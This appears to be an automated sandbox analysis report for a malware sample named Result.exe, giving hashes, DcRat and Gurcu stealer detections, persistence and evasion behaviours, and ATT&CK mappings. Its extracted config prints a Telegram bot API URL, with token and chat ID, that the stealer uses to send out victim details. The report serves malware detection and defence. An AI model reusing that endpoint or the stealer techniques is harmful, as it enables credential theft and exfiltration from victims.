General
-
Target
Result.exe
-
Size
2.6MB
-
Sample
240711-xzmcgazgkm
-
MD5
170b43350048ed4b6fca0e50a0178621
-
SHA1
db863b7b04a7c58baa9120e2f184517ed27a7252
-
SHA256
248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
-
SHA512
e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7
-
SSDEEP
49152:QBojA1ji5xFbA3j2B0tDrgop9U+t3DqScnLeMgs9Q:QU57bVB0tDrg+USDPcLeQQ
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20946cf98fc71fd1f8dce806e356c572f84f7e0ade%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20YPIMFIYL%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CDefault%20User%5Csppsvc.ex
Targets
-
-
Target
Result.exe
-
Size
2.6MB
-
MD5
170b43350048ed4b6fca0e50a0178621
-
SHA1
db863b7b04a7c58baa9120e2f184517ed27a7252
-
SHA256
248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
-
SHA512
e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7
-
SSDEEP
49152:QBojA1ji5xFbA3j2B0tDrgop9U+t3DqScnLeMgs9Q:QU57bVB0tDrg+USDPcLeQQ
Score10/10-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Modifies WinLogon for persistence
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
DCRat payload
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting
-
Adds Run key to start application
-
Blocklisted process makes network request
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1